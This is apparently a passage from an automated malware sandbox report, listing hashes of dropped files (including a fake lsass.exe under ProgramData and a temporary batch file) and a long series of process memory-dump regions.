SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

C:\ProgramData\lsass\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

memory/4744-280-0x0000000000B60000-0x0000000000F80000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\lsass.exe.log

MD5 24cfd42a8de70b38ed70e1f8cf4eda1c
SHA1 e447168fd38da9175084b36a06c3e9bbde99064c
SHA256 93b740416114e346878801c73e8a8670ff1390d3fa009424b88fafe614a3c5cd
SHA512 5c2daf5328ba99d750e9d0362e84f3a79b7fc8395aa8aa2bc1a01b266583fe1f8352bf0619f985aa72223412d14afa054537739b4941610a1d0f96e7fee2a875

memory/1940-282-0x0000000000AF0000-0x0000000000F10000-memory.dmp

memory/1940-283-0x0000000000AF0000-0x0000000000F10000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmpD7D.tmp.bat

MD5 40dfffb163bd48b6044002ca2f43b6b4
SHA1 c7c3860192be125ff057640b71572e0832f5e585
SHA256 cca43c5207cbc92221e4870432c65e9ba22892cf3760e66c3ba34efbca035a6c
SHA512 aeaaff7c8bcea0925a946e51f19584313582f3cf41497c5cc3c258be791014120fcaff645ce24e32c89a1853c28efe112e59617e7fb2be3c6eda3863835305ce

memory/3060-285-0x0000000000400000-0x000000000083B000-memory.dmp

memory/340-286-0x0000013339C10000-0x0000013339C50000-memory.dmp

memory/1940-287-0x0000000006CD0000-0x0000000006CDA000-memory.dmp

memory/2060-288-0x00007FF625430000-0x00007FF625459000-memory.dmp

memory/340-289-0x00007FF70D560000-0x00007FF70DD4F000-memory.dmp

memory/1940-290-0x0000000000AF0000-0x0000000000F10000-memory.dmp

memory/1940-292-0x0000000000AF0000-0x0000000000F10000-memory.dmp

memory/3060-291-0x0000000000400000-0x000000000083B000-memory.dmp

memory/2060-293-0x00007FF625430000-0x00007FF625459000-memory.dmp

memory/340-294-0x00007FF70D560000-0x00007FF70DD4F000-memory.dmp

memory/1940-295-0x0000000000AF0000-0x0000000000F10000-memory.dmp

memory/3060-296-0x0000000000400000-0x000000000083B000-memory.dmp

memory/340-298-0x0000013339C50000-0x0000013339C70000-memory.dmp

memory/340-299-0x00007FF70D560000-0x00007FF70DD4F000-memory.dmp

memory/1940-300-0x0000000000AF0000-0x0000000000F10000-memory.dmp

memory/3060-301-0x0000000000400000-0x000000000083B000-memory.dmp

memory/340-303-0x00007FF70D560000-0x00007FF70DD4F000-memory.dmp

memory/340-304-0x0000013339C50000-0x0000013339C70000-memory.dmp

memory/1940-305-0x0000000000AF0000-0x0000000000F10000-memory.dmp

memory/3060-306-0x0000000000400000-0x000000000083B000-memory.dmp

memory/340-308-0x00007FF70D560000-0x00007FF70DD4F000-memory.dmp

memory/1940-309-0x0000000000AF0000-0x0000000000F10000-memory.dmp

memory/3060-310-0x0000000000400000-0x000000000083B000-memory.dmp

memory/340-312-0x00007FF70D560000-0x00007FF70DD4F000-memory.dmp

memory/1940-313-0x0000000000AF0000-0x0000000000F10000-memory.dmp

memory/3060-314-0x0000000000400000-0x000000000083B000-memory.dmp

memory/340-316-0x00007FF70D560000-0x00007FF70DD4F000-memory.dmp

memory/1940-317-0x0000000000AF0000-0x0000000000F10000-memory.dmp

memory/3060-318-0x0000000000400000-0x000000000083B000-memory.dmp

memory/340-320-0x00007FF70D560000-0x00007FF70DD4F000-memory.dmp

memory/1940-321-0x0000000000AF0000-0x0000000000F10000-memory.dmp

memory/3060-322-0x0000000000400000-0x000000000083B000-memory.dmp

memory/340-324-0x00007FF70D560000-0x00007FF70DD4F000-memory.dmp

memory/1940-325-0x0000000000AF0000-0x0000000000F10000-memory.dmp

memory/3060-326-0x0000000000400000-0x000000000083B000-memory.dmp

memory/340-328-0x00007FF70D560000-0x00007FF70DD4F000-memory.dmp

memory/1940-329-0x0000000000AF0000-0x0000000000F10000-memory.dmp

memory/3060-330-0x0000000000400000-0x000000000083B000-memory.dmp

memory/340-332-0x00007FF70D560000-0x00007FF70DD4F000-memory.dmp

memory/1940-333-0x0000000000AF0000-0x0000000000F10000-memory.dmp

memory/3060-334-0x0000000000400000-0x000000000083B000-memory.dmp

memory/3060-335-0x0000000004910000-0x0000000004911000-memory.dmp

memory/340-337-0x00007FF70D560000-0x00007FF70DD4F000-memory.dmp

memory/1940-338-0x0000000000AF0000-0x0000000000F10000-memory.dmp